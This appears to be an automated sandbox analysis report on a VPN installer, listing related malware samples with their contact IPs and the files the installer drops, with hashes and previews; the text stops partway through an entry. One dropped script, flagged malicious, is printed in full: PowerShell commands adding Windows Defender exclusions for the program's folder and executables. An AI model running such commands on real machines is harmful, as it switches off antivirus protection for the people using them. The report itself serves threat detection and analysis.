                                                                                                                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  elitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 180.76.189.193
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 182.61.224.158
                                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSsparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  • 204.79.197.219

                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):318
                                                                                                                                                                                                  Entropy (8bit):4.740682303463164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:IPeGgdEYC5BeGgdEEFmJovkBPeGgdEEFrGvkBPeGgdEEFwn0ZkBPeGgdEEFQr4MF:ISuFAuEcJxSuEJGQSuEyPSuESr1SuE6
                                                                                                                                                                                                  MD5:B34636A4E04DE02D079BA7325E7565F0
                                                                                                                                                                                                  SHA1:F32C1211EAC22409BB195415CB5A8063431F75CD
                                                                                                                                                                                                  SHA-256:A9901397D39C0FC74ADFDB95DD5F95C3A14DEF3F9D58EF44AB45FC74A56D46DF
                                                                                                                                                                                                  SHA-512:6EB3255E3C89E2894F0085095FB5F6AB97349F0ED63C267820C82916F43A0AC014A94F98C186FF5D54806469A00C3C700A34D26DE90AFB090B80AC824A05AA2F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:Add-MpPreference -ExclusionPath "C:\Program Files (x86)\letsvpn"..Add-MpPreference -ExclusionProcess "LetsPRO.exe"..Add-MpPreference -ExclusionProcess "tapinstall.exe"..Add-MpPreference -ExclusionProcess "uninst.exe"..Add-MpPreference -ExclusionProcess "Update.exe"..Add-MpPreference -ExclusionProcess "ndp462-web.exe"

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\LetsPRO.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):247840
                                                                                                                                                                                                  Entropy (8bit):6.8984241672651985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:jZzvhs2Z4n1E7g34XtVYAOfTd/z44JsQw4UsrV:jJ+2Z4nShVY5JUCUu
                                                                                                                                                                                                  MD5:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  SHA1:5BE7B8E19418212A5A93E900C12830FACFD6BA54
                                                                                                                                                                                                  SHA-256:E0669B6312BAAEF6A3C86F3142B333EAB48494511405398BB09CC464881A43C9
                                                                                                                                                                                                  SHA-512:23BAAE23815FC946203BE6D93CEF84FF23FDE8ED88017179C65B7DE1F3B6114BC8343C277B8AE5A1D85AA59F25B5F146C1D827B7E4617BFD0AA0FF20359F49B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..O.S.O.S.O.S.).R.O.S.).R.O.S.).R.O.S.'.R.O.S.'.R.O.S.'.R.O.S.).R.O.S.O.S.O.S5&.R.O.S5&.S.O.S.O.S.O.S5&.R.O.SRich.O.S........................PE..L.....p_............................+.............@..................................V....@.....................................<.......X............... ........!......p...............................@...............,............................text...8........................... ..`.rdata..V...........................@..@.data....#..........................@....rsrc...X...........................@..@.reloc...!......."...x..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\Update.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1911328
                                                                                                                                                                                                  Entropy (8bit):5.911432104400453
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:IWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2T:Vt3UCiag6CKM2zCyZuOjJaxSS5qhr
                                                                                                                                                                                                  MD5:FE1E856A9B3491135C7D0FFF820F7025
                                                                                                                                                                                                  SHA1:3DAEBB0C6DCE636D9E4309568AE1882CB30D4A7C
                                                                                                                                                                                                  SHA-256:ED1CF65B74438AD7AFACE47E0A613228C1E5C44C29B556D18AC797FBE7F2D7B7
                                                                                                                                                                                                  SHA-512:8D43C859414394945443224CCEB39241DD287786903290D3F774306734CACA44E8E50CC8258764DFF3C194BA95EBA2A35A230427CA26AF04A882356868D32996
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\Update.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`......T.....@.....................................W.... .................. ....@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\.check_result

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                  Entropy (8bit):4.040775468486825
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Gkg2day58L:GL2db8L
                                                                                                                                                                                                  MD5:862D9ED729F9BD1209A13C49C8388CFC
                                                                                                                                                                                                  SHA1:18C5C6FAAEC66D790893DD34D6A415879E36E92C
                                                                                                                                                                                                  SHA-256:A21ED21B8C02AD37840FB4374873858F650A7EBE9C29789D2562B51F30C2922B
                                                                                                                                                                                                  SHA-512:33C78DE82C4B449B59BEBA7BC7F700F5A9E271007B7D79A95C99F994CC15C151FD25471DD8682BEB06C55D4BB282E7890282947C8CD16419311E911900005FE5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:LetsPRO.exe Started Successfully.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):113696
                                                                                                                                                                                                  Entropy (8bit):6.322809804830913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:HARI0MvSAA6U7ks4jhOWE8i6wrNMRjYAZlfNASZfSOi3d3qKbE/mf:HWMpA6Agg8ahQYAZlFnUdXE/w
                                                                                                                                                                                                  MD5:C5485166B86B4CD6DE97C4DC8D0FBEFB
                                                                                                                                                                                                  SHA1:C047F339399098E7E4BF92EF7A8F38C1E5D5054D
                                                                                                                                                                                                  SHA-256:21678620BF5E7B4C8481270594B0A36615BE6152CA7A9396487364712236A3D5
                                                                                                                                                                                                  SHA-512:33EFDA5903587D17A698BFAEC6E5C119D4ADCFC23EA1588F2B155FFCBA88761E40E1DB791F545A064EFFDC63E6BA7AA68027C96B4A632331C0EA7297AC093F26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..~............... ........... ....................................`.................................a...O....................... ...............T............................................ ............... ..H............text....|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B........................H.........................................................................{9...*..{:...*V.(;.....}9.....}:...*...0..A........u#.......4.,/(<....{9....{9...o=...,.(>....{:....{:...o?...*.*.*. ..1 )UU.Z(<....{9...o@...X )UU.Z(>....{:...oA...X*...0..b........r...p......%..{9......%q&....&...-.&.+...&...oB....%..{:......%q'....'...-.&.+...'...oB....(C...*..{D...*..{E...*V.(;.....}D.....}E...*.0..A........u(.......4.,/(<....{D....{D...o=...,.(>....{E....{E...o?...*.*.*. ...[ )UU.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.988106171788286
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Ou/ZC45lIZhqWOHlLf2KQcvBZ96DJS+ShjmM6IGBkS6mSvh:R/Z/lkq3b2KZBZMdS+ST6nkH
                                                                                                                                                                                                  MD5:EEF5553A62C9421A730CAE5A74B196B4
                                                                                                                                                                                                  SHA1:829F4010C8B325EEA88568F751D94E9ADB760679
                                                                                                                                                                                                  SHA-256:53E1E7F75B35BA11DD781E747BA6190B010EB104BCCCC695A19D0F60C4F88468
                                                                                                                                                                                                  SHA-512:CC6484D1042A688D9380899DF46D7EABC524E1DB41978CE7F5F60CEF66E9DD0B6D00909AC3DEF47D2DF90E194D779BD278B4A18F9A6857A5A5876FB8957121FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................-... ...@....... ..............................h^....@..................................,..S....@.................. ....`.......+............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......$!..l...................P .......................................h....X|f.........+.j$....r.~.3i....m2.....'.|..OZ.ep..)t?...P6c.<<Qe.M...M.0.B.(+.v.Kk!...Y.....H..7r.[(.r....J_.!.....l.0..,...............~.......j.j.j....... .(....-.s....z*N.j...(....-.s....z*..(....*BSJB............v2.0.50727......l.......#~..(... ...#Strings....H.......#US.P.......#GUID...`.......#Blob...........W?........%3....................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.012730771621166
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:24TduWhqWOHlLf2KQcvBZ9SaqS+ShjmM6IGBkSm:Jdnq3b2KZBZbqS+ST6nkd
                                                                                                                                                                                                  MD5:839E774D3E0B80A9C407A1269D66D11A
                                                                                                                                                                                                  SHA1:76578166AAFDA33F896F195C890E6A36D9EECF42
                                                                                                                                                                                                  SHA-256:ABB8794A52C85A16A4CAD28C99FEA73AE4730ED7B2F708EF58894CC1791217C9
                                                                                                                                                                                                  SHA-512:37199AC53A2F137C529373FDBC9DDCB1A64DA78BE0E37EF15B2AF31276C115BEA04E0BF557F8124687AF20357A5DD1F2D5BD0B8C2483E2B389EEDE1295C148FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................*... ...@....... ...............................T....@..................................*..K....@.................. ....`......H)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........!..D...................P .......................................!{.`DzN?...dr..1..9..NN/...[..t...2......C.......x..YCU......=....{.9W.J......^S.N;...iY........RBA......{..u..\~..1/M..^....~....(....-.s....z*J....(....-.s....z*..(....*.BSJB............v2.0.50727......l.......#~......`...#Strings....|.......#US.........#GUID...........#Blob...........G7........%3......................................................................y............... .......y.....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16416
                                                                                                                                                                                                  Entropy (8bit):6.978847822864083
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:DYMXhqWOHlLf2KQcvBZ9M+AS+ShjmM6IGBkSZ:Dxq3b2KZBZnAS+ST6nki
                                                                                                                                                                                                  MD5:B6634DCB0B38617B4345A4346DA620C7
                                                                                                                                                                                                  SHA1:D7F8903AF96F76B09189BB01B641A19B147138C8
                                                                                                                                                                                                  SHA-256:8A397246E984B4FD51A15C5E71BD217A92061F9AEC3CB6CFCB938834E9DD4B65
                                                                                                                                                                                                  SHA-512:ECD24F51763627E1CC90D0AA1491B5352B3222F744647821DBD8B18C080863A12FEB8FD79B1A4BEC733404D095FA37821280339C94C08CFEB142F632FA2CEC23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.6S...........!.................(... ...@....... ..............................O.....@..................................'..W....@.................. ....`.......&............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H........ ......................P ......................................%.&...Fm........f...Dj..[..(...:w........s4H.. ...p.+^z...;_....~.k...|... ..q..+.cv.VZ.A.[[|..m.0...w.._m.<0...d-.[.R.BSJB............v2.0.50727......l.......#~...... ...#Strings.... .......#US.(.......#GUID...8.......#Blob...........G.........%3............................................................................3.....G.....U.....n.........'...................................%.7.........

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):221216
                                                                                                                                                                                                  Entropy (8bit):7.175286065819943
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:qRP7/P97ilHDqO01ktQOzB4YjDnX08RYA3fP5SQm4:qRPpilHD+kQA4uk8RYA3f9
                                                                                                                                                                                                  MD5:C855A1C05CCD6547B4FF0CCA4D872D13
                                                                                                                                                                                                  SHA1:07D5A6BA39B36629AE598AC09FCF54B8A3FB5173
                                                                                                                                                                                                  SHA-256:F53A3E13BE932261994E12A14BC9607B32CB2FE39C31027A1CEFCA4B90CDC4A5
                                                                                                                                                                                                  SHA-512:33C0E60A9A212133F98B6D93409CF9FEDC4CBE537B2E01A35DCE5350DB565A13962B8B2281DE1926E93870414F1EC507666A435716BB1CFE777D6481CFF1ED71
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....nX...........!.....(...........G... ........@.. ...............................t....@.................................`G..K....`...............2.. ............F............................................... ............... ..H............text....'... ...(.................. ..`.rsrc........`.......*..............@..@.reloc...............0..............@..B.................G......H........C..............D1......LC......................................F.~....o.........*..J.~..........o....*..0..E........u....-.*.t.......(....u....-.*..(............~....o...........o....*....0..T.......r...ps....re..ps.........r...p.....(.........(.................s....s....(.........*.0..G.............o....u....%-.&s......o....(...+(...+..,..#........o....+G.o....#........s....o...........o..........#.......?#.......?s....o....s.....s....%#........s....o....% h...ls...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):56864
                                                                                                                                                                                                  Entropy (8bit):6.227644515850694
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XfgAOG37OIh4Pqr8OvsQu4wwC9ZBMSq3b2KZBZpS+ST6nkYEIU:Xfgng6Ie1OvI4wwC9893qKj/mSU
                                                                                                                                                                                                  MD5:AAA8B3FA658B9620A798082968201334
                                                                                                                                                                                                  SHA1:660063E688A9C84F87B9F2C9F8FB11D5952139B9
                                                                                                                                                                                                  SHA-256:891C29FCB32C28C74E050BFD7D31D0C4C5FB2ABC5B877A542E25CB7DAA530189
                                                                                                                                                                                                  SHA-512:8AABA264914450716292D53AE86D631C37B3952304E51217CEC4BD83FE2BF958EF84D6C687D4D05A6D0FA52039A4856B393271C1E69D14A2454C1FAAB13F96AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Kn.V...........!..................... ........... ....................... ......k!....`.....................................O.......X............... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...X...........................@..@.reloc..............................@..B........................H........O...s...........................................................0..b............(....-P....=....s......o....o.......(.....o....o.......(....s....s............,..o.....~....*..........7R.......0..).......(.......(....-.#.......?*..( ......(!...*....0..).......(.......(....-.#.......?*..( ......("...*....0............s......o.....o...........o....-...(#....X...($.....+p.o.....3...(#......($.....(%...Y.Y..+J.o.....3...(#......(&.....(%...X.X..+$.o.....3...(#.....('...Y.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):629280
                                                                                                                                                                                                  Entropy (8bit):6.141793124988224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:ZTTh6UXqQ0l0l2b4GQnn9lXNbOpIeQjDfjJcxm04FSh+0Nsj8X+iKbH2Yjot8J:HaQ0SnPNb8IbJImZo4LF
                                                                                                                                                                                                  MD5:7A9664E3077147897846682A2541F393
                                                                                                                                                                                                  SHA1:5BF7093E86D48AF5BEDB93AEA5F7415EB8DDB5D8
                                                                                                                                                                                                  SHA-256:23D5B87425994CBC03DAB7F9C30A70FB0DF0264FE15243DF4B9F9A7731D87ADB
                                                                                                                                                                                                  SHA-512:ED8C0F8F00E750E04857B3650546FEB1CEC80196D8EE4FEB5F7BB7A5C2A5CAAB7B379E963A3FE10847C5305C488D5FDC926F00952BD22E990CF11088BDEB3183
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....L..........." ..0..b.............. ........... ..............................J.....`.....................................O....................l.. ...............T............................................ ............... ..H............text....`... ...b.................. ..`.rsrc................d..............@..@.reloc...............j..............@..B.......................H...........<N...........a..`...(.........................................{w...*..{x...*V.(y.....}w.....}x...*...0..;........u;.....,/(z....{w....{w...o{...,.(|....{x....{x...o}...*.*. .7.^ )UU.Z(z....{w...o~...X )UU.Z(|....{x...o....X*.0...........r...p......%..{w..........>.....>...-.q>........>...-.&.+...>...o.....%..{x..........?.....?...-.q?........?...-.&.+...?...o.....(....*..{....*..{....*V.(y.....}......}....*...0..;........u@.....,/(z....{.....{....o{...,.(|....{...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7918112
                                                                                                                                                                                                  Entropy (8bit):6.369226842144576
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:z1qq//2Zh39WUIKFE6gffcae/7ky9I83W2A:ZqrIKaf0L7kyS83W2A
                                                                                                                                                                                                  MD5:1135A24F997D3C473BFD8105223B93F3
                                                                                                                                                                                                  SHA1:EA5DB547FA0CBA6DBC588D975E73677F4CA8AC29
                                                                                                                                                                                                  SHA-256:0A6F43AFEC08D3BD41DA246A0AE22EFC4FB48C1788AA7890BCAC68CC22D0F780
                                                                                                                                                                                                  SHA-512:49B9CDD70FB84E55AC70872DDD49AAB40DD5438BDF6F39378C63BE6977D7F3C33B16C10505054050ED52FAE65B8FC755AB6901E6144813235DEEA894A81D0D40
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#......A...x...............A...Tn..........................|.......y...@... .......................y...... y......`y...............x. ....py.t............................Py.....................|"y.@............................text.....A.......A.................`.``.data.........A.......A.............@.p..rdata..l.0..pE...0..RE.............@.p@.bss....H.... v.......................p..edata........y.......u.............@.0@.idata....... y.......u.............@.0..CRT....,....@y.......v.............@.0..tls.... ....Py.......v.............@.0..rsrc........`y.......v.............@.0..reloc..t....py.......v.............@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124392
                                                                                                                                                                                                  Entropy (8bit):5.750227631115462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:G803aH5iTX9ctYESyMlOs4u3yUyJCbtAYD7IPLdM1O3qKe/mU:X/wz9cyyM7kwwGOi/n
                                                                                                                                                                                                  MD5:764EF886ADF57B8C7233556114030BCB
                                                                                                                                                                                                  SHA1:F4FE2F5C57B27A1A23D286E18533E47466F18059
                                                                                                                                                                                                  SHA-256:26F5D45D9E94A2800B9752AD0D9FD83F97569E611A9ED45DCC36C0716F6A84CD
                                                                                                                                                                                                  SHA-512:DF19D04B1A2FD65098F99C64877301D76898724A5692F0166C0AC0E211C4F0395FD0DCDB7367F51096180D6BBE325AF30763902C992383BF090B9E9C3D8C7458
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?Hg.@............... ...................0....@.................................,......... ..............................`..........H.............. ...........................................................8a...............................text............ .................. .P`.data...,....0.......$..............@.0..rdata.......@.......&..............@.0@.bss....P....P........................p..idata.......`......................@.0..CRT....4....p.......6..............@.0..tls.... ............8..............@.0..rsrc...H............:..............@.0./4...................>..............@.@B/19..................B..............@..B/31.....B....`......................@..B/45.................................@..B/57.................."..............@.0B/70..................*..............@..B/81.................................@..B/92.....0............<..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1588256
                                                                                                                                                                                                  Entropy (8bit):6.9087996682239625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:omFBUz/C41ab246LQ1+wa/AjHvKUY6qHpJ:DQCyab2o+wukvbf2
                                                                                                                                                                                                  MD5:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  SHA1:C4C10199B5F7D50D641D115F9D049832EC836785
                                                                                                                                                                                                  SHA-256:A41077ED210D8D454D627D15663B7523C33E6F7386CD920A56FBCFBB0A37547D
                                                                                                                                                                                                  SHA-512:23C4AAC046FFDECAA64ACBEE9579634C419202BE43463927DFABF9798DED17B1B7A1199F1DB54E247D28D82F39F3F352AC3ACBADE2118C67717FD37260BD8B4F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..d............... ........@.. ....................................`....................................O.......\............... ....`......P...8............................................ ............... ..H............text...8b... ...d.................. ..`.rsrc...\............f..............@..@.reloc.......`......................@..B........................H............J...............z............................................{*...*..{+...*V.(,.....}*.....}+...*...0..A........u........4.,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*.*. .z.. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*...0..b........r...p......%..{*......%q.........-.&.+.......o3....%..{+......%q.........-.&.+.......o3....(4...*..(5...*^.(5..........%...}....*:.(5.....}....*:.(5.....}....*:.(,.....}....*..(6...*..(7...*..*J.{....%-.&*.o8...*..(5...*:.(

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe.config

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
